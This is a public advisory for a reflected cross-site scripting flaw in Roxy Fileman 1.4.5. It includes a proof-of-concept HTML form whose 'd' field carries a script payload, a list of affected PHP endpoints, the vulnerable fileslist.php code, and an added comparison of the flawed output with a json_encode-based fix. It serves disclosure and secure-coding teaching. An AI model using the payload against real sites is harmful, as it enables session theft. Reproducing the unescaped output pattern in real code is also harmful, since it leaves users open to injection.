Roxy Fileman 1.4.5 Cross Site Scripting

Posted Jan 13, 2017
Authored by Nc Kh

Roxy Fileman version 1.4.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 4121ac2901b76a000dc187988c251ad5a0b33ca7110116e14d0094e4806781f2


*=============================================================|
| Exploit Title: Roxy Fileman Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.roxyfileman.com/
|
| Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php
|
| Version : V 1.4.5
|
| Platform : PHP
|
| Tested on: Kali Linux
|
| Date: 1/12/2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
|   <TITLE>Roxy Fileman Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<!-- d is the directory parameter fileslist.php reads from $_POST; the
|     field needs name="d" (not id="d") or the browser will not send it. -->
|<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post">
|  <input type="hidden" name="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25<script>alert('M.R.S.L.Y')</script>">
|  <input type="submit" value="Submit">
|</form>
|</BODY>
|</HTML>
|
*=======================|
| Vulnerable methods: GET & POST
| Files that have this vulnerability:
|
| http://Target/[PATH]/fileman/php/copydir.php
| http://Target/[PATH]/fileman/php/copyfile.php
| http://Target/[PATH]/fileman/php/createdir.php
| http://Target/[PATH]/fileman/php/deletedir.php
| http://Target/[PATH]/fileman/php/renamedir.php
| http://Target/[PATH]/fileman/php/thumb.php
| http://Target/[PATH]/fileman/php/movefile.php
| http://Target/[PATH]/fileman/php/downloaddir.php
| http://Target/[PATH]/fileman/php/dirtree.php
| http://Target/[PATH]/fileman/php/movedir.php
*=======================|
|How to fix this vulnerability :
|
|Escape every input variable before it is echoed. In the script below,
|$path comes straight from $_POST['d'] and is written into the response
|with only the double quote escaped (mb_ereg_replace('"', '\\"', ...)),
|so <, >, ' and & reach the client unchanged. Build the response with
|json_encode() (using the JSON_HEX_TAG, JSON_HEX_APOS, JSON_HEX_QUOT and
|JSON_HEX_AMP flags) instead of string concatenation, and send
|Content-Type: application/json together with X-Content-Type-Options:
|nosniff. If no Content-Type header is set elsewhere, PHP's default of
|text/html lets the browser render the reflected payload as HTML.
|
*=======================|
|Vulnerable code, for example (fileman/php/fileslist.php):
|
|<?php
|include '../system.inc.php';
|include 'functions.inc.php';
|
|verifyAction('FILESLIST');
|checkAccess('FILESLIST');
|
|// $path is taken directly from the POST parameter d
|$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']);
|$type = (empty($_POST['type'])?'':strtolower($_POST['type']));
|if($type != 'image' && $type != 'flash')
|  $type = '';
|verifyPath($path);
|
|$files = listDirectory(fixPath($path), 0);
|natcasesort($files);
|$str = '';
|echo '[';
|foreach ($files as $f){
|  $fullPath = $path.'/'.$f;
|  if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f)))
|    continue;
|  $size = filesize(fixPath($fullPath));
|  $time = filemtime(fixPath($fullPath));
|  $w = 0;
|  $h = 0;
|  if(RoxyFile::IsImage($f)){
|    $tmp = @getimagesize(fixPath($fullPath));
|    if($tmp){
|      $w = $tmp[0];
|      $h = $tmp[1];
|    }
|  }
|  // sink: $fullPath (attacker-controlled via d) is echoed with only '"' escaped
|  $str .= '{"p":"'.mb_ereg_replace('"', '\\"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},';
|}
|$str = mb_substr($str, 0, -1);
|echo $str;
|echo ']';
|?>
*=============================================================|
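The fix recommended above, worked through as an added example that is not Roxy Fileman's own code: the JSON-building loop from fileslist.php is reduced to one function and placed beside a hardened replacement, and both are run over a constructed path modelled on the advisory's payload. The sample file names, the buildList* function names and the jsonHeaders() helper are assumptions made for illustration.

```php
<?php
// Added example, not code from Roxy Fileman. Reproduces the hand-built JSON
// pattern of fileslist.php (vulnerable) next to a json_encode()-based
// replacement (hardened). $path and $files below are constructed input.

// Vulnerable pattern: JSON assembled by string concatenation, with only the
// double quote escaped. < > ' & and a backslash in the attacker-controlled
// path pass through untouched, and a trailing backslash even neutralises the
// one escape that is applied (\" becomes \\" and closes the string).
function buildListVulnerable(string $path, array $files): string
{
    $str = '';
    foreach ($files as $f) {
        $fullPath = $path . '/' . $f;
        $str .= '{"p":"' . mb_ereg_replace('"', '\\"', $fullPath) . '"},';
    }
    return '[' . mb_substr($str, 0, -1) . ']';
}

// Hardened: let json_encode() produce the document. The JSON_HEX_* flags
// encode < > ' " & as \u00XX escapes, so the body contains no HTML
// metacharacters even if a browser is ever talked into rendering it.
function buildListSafe(string $path, array $files): string
{
    $out = [];
    foreach ($files as $f) {
        $out[] = ['p' => $path . '/' . $f];
    }
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_UNESCAPED_SLASHES;
    $json  = json_encode($out, $flags);
    if ($json === false) {
        // e.g. a file name that is not valid UTF-8; fail closed, never echo raw input
        throw new RuntimeException('json_encode failed: ' . json_last_error_msg());
    }
    return $json;
}

// Headers the endpoint should send with either builder: declare JSON and
// forbid MIME sniffing so the response is never interpreted as HTML.
function jsonHeaders(): array
{
    return [
        'Content-Type: application/json; charset=utf-8',
        'X-Content-Type-Options: nosniff',
    ];
}

// Constructed input: the path an attacker would post as d, with the
// advisory's XSS probe appended.
$path  = "/fileman/Uploads'\"()&%<script>alert('M.R.S.L.Y')</script>";
$files = ['a.jpg', 'b.png'];

foreach (jsonHeaders() as $h) {
    header($h);   // ignored at the CLI, sent to the client under a web server
}

echo "vulnerable: ", buildListVulnerable($path, $files), PHP_EOL;
echo "hardened:   ", buildListSafe($path, $files), PHP_EOL;
```

Running this at the CLI prints the vulnerable line with the `<script>` tag intact and the hardened line with `<`, `>`, `'`, `"` and `&` replaced by `\u003C`, `\u003E`, `\u0027`, `\u0022` and `\u0026`; a JSON client decodes both to the same path, but only the second is inert if served or sniffed as HTML. The header helper matters independently of the encoding: the original script sends no Content-Type in the snippet shown, and PHP's default is text/html.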
| Special Thanks To : Ehsan Cod3r, micle, Und3rgr0und, Amir.ght,
| xenotix, modiret, V For Vendetta, Alireza, r4ouf, Spoofer,
| And All Of My Friends. The Last One : My Self, M.R.S.L.Y
*=============================================================|